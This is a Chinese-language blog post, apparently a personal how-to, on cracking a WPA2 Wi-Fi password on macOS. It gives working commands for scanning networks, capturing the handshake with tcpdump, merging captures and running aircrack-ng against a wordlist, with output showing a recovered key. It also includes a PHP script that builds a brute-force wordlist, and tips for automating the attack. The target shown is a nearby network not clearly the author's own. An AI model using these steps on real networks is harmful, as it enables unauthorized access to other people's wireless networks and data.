Mac破解wifi

家里wifi坏了，刚好Mac本闲着 ，尝试鼓捣了一下wifi破解

1.安装和更新aircrack-ng

 brew install aircrack-ng 

2. 嗅探附近wifi

sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport

airport -s

得到如下数据

SSID	BSSID	RSSI	CHANNEL	HT	CC	SECURITY (auth/unicast/group)
iPhone	e2:89:7e:af:02:b8	-63	6	Y	CN	WPA2(PSK/AES/AES)

3.开始抓取wifi握手包

sudo airport en0 sniff 1

问题来了，Mac 10.14 Mojave版本会出现 Segmentation fault 问题

Capturing 802.11 frames on en0.
Segmentation fault: 11

于是，我们该用tcpdump来监听

# 断开wifi的连接
$ sudo airport -z

# 设置嗅探频道为1
$ sudo airport -c1

# 查看是否设置成功
$ sudo airport -c
chancek：1

重点来了！

#此处 $BSSID 替换为目标wifi的 MAC地址 （e2:89:7e:af:02:b8）
$ sudo tcpdump "type mgt subtype beacon and ether src $BSSID" -I -c 1 -i en1 -w beacon.cap
tcpdump: listening on en1, link-type IEEE802_11_RADIO (802.11 plus radiotap header), capture size 262144 bytes
1 packet captured
83 packets received by filter
0 packets dropped by kernel

# Got为0等待Wi-Fi被连接
$ sudo tcpdump "ether proto 0x888e and ether host $BSSID" -I -U -vvv -i en1 -w cap.cap
tcpdump: listening on en1, link-type IEEE802_11_RADIO (802.11 plus radiotap header), capture size 262144 bytes
Got 0

# Got为4当wifi被连接时成功抓取握手包
$ sudo tcpdump "ether proto 0x888e and ether host $BSSID" -I -U -vvv -i en1 -w cap.cap
tcpdump: listening on en1, link-type IEEE802_11_RADIO (802.11 plus radiotap header), capture size 262144 bytes
Got 4

4.拼接cap文件

$ mergecap -a -F pcap -w result.cap beacon.cap cap.cap

如果遇到 mergecap : command not found，安装下wireshark

$ brew install wireshark

$ mergecap -a -F pcap -w result.cap beacon.cap cap.cap

5.跑密码字典

$ aircrack-ng -w password.txt result.cap

结果如下

                               Aircrack-ng 1.6

      [00:00:00] 8/10 keys tested (57.73 k/s)

      Time left: --

                           KEY FOUND! [ 88888 ]


      Master Key     : 8B B1 AF 60 79 19 94 C5 FD 5A 4C 61 A9 9A E7 40
                       8B CF FB 88 7D AE 1F 02 E6 ED AF DE C3 5B E9 39

      Transient Key  : A1 1D EC EB 4D D9 0B 9B 18 46 15 E2 29 B2 43 AD
                       4D FB 3C 70 69 15 95 DA BF 04 93 A6 39 A9 FC EC
                       91 3E 81 B8 20 BC 79 D7 AC C8 C5 24 97 D2 5E DA
                       38 15 00 75 37 E8 B8 90 63 09 06 B0 E4 19 F6 A6

      EAPOL HMAC     : DD 7F 07 A1 43 DF E2 C6 DC D8 7F 69 1C BC E3 41

6.密码字典的获取

首先，github上有许多开源的密码字典可以使用

但是要针对某个wifi破解，就需要针对性的密码字典

我采用暴力破解模式

通过穷举字符算法+穷举排列算法

得到所有可能的密码串

英文字母大写+小写+数字

（已获取其中四位序列）

4位密码混合穷举数量最多为 14776336

因每位上的字符都不重复

得出密码 13388280 组

算法如下：

<?php
/**
 * test.php
 * Created by PhpStorm.
 * Date: 2020-02-20
 * Time: 6:06
 * Author: G.Q
 * E-mail: yiyezhiqiutel@gmail.com
 */

//函数部分开始
function getSequenceAry($arr,$num=1)
{
    $count = count($arr);
    $min   = min($count,$num);

    if($min<1){
        return false;
    }

    $return =array();
    for(;$min>=1;$min--){
        $arrRet = array();
        $max = $count-($min-1);
        for($i=0;$i<$max;$i++){
            getSequenceArySub($arr,$count,$min,$i,$arrRet,$return);

        }
    }
    return $return;

}

function getSequenceArySub($arr,$count,$min,$i,$arrRet=array(),& $return){
    if(empty($arr) || empty($count))
        return false;
    if(1==$min){
        $arrRet[--$min] = $arr[$i];
        $return[] = $arrRet;
    }else{
        $arrRet[--$min] = $arr[$i];
        for($j = $i+1;$j<($count);$j++){
            getSequenceArySub($arr,$count,$min,$j,$arrRet,$return);
        }
    }
}

function getSequenceStr($arr)
{
    if (count($arr) == 1) {
        return $arr;
    }
    $arrRet = array();
    foreach ($arr as $k => $v) {
        $arr2 = $arr;
        unset($arr2[$k]);
        $arrOrderList = getSequenceStr($arr2);
        foreach ($arrOrderList as $order) {
            $arrRet[] = $v . $order;
        }
    }
    return $arrRet;
}

//运行部分开始
$ret = getSequenceAry(["a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9"],4);
$count = 0;
$fileNum = 1;
foreach ($ret as $v ){
    if (count($v)!=4) continue;
    $res=getSequenceStr($v);
    foreach ($res as $vv){

        $count ++;
//        $filename = "./".$fileNum.".txt";
//
//        $handle = fopen($filename, "a+");
//
//
//        $str = fwrite($handle, "6uYn".$vv."\n");
//
//        set_time_limit(0);
    }
}
//fclose($handle);
echo $count;

7.后记

1.建议不要怕麻烦，先用网上的字典撞一遍

2.正式开始前，先用自己的wifi测试一次

3.树莓派4B板子上的无线网卡不支持monitor模式

想要用树莓派搞的就不要浪费时间啦

4.建议开始前先sudo到root下开始

5.可以看看hashcat，以及在线HashCrack

---

PS：之后可以把写个脚本，自动去搞

参考文献：
https://www.saltwaterc.eu/capturing-wpa-handshakes-with-os-x.html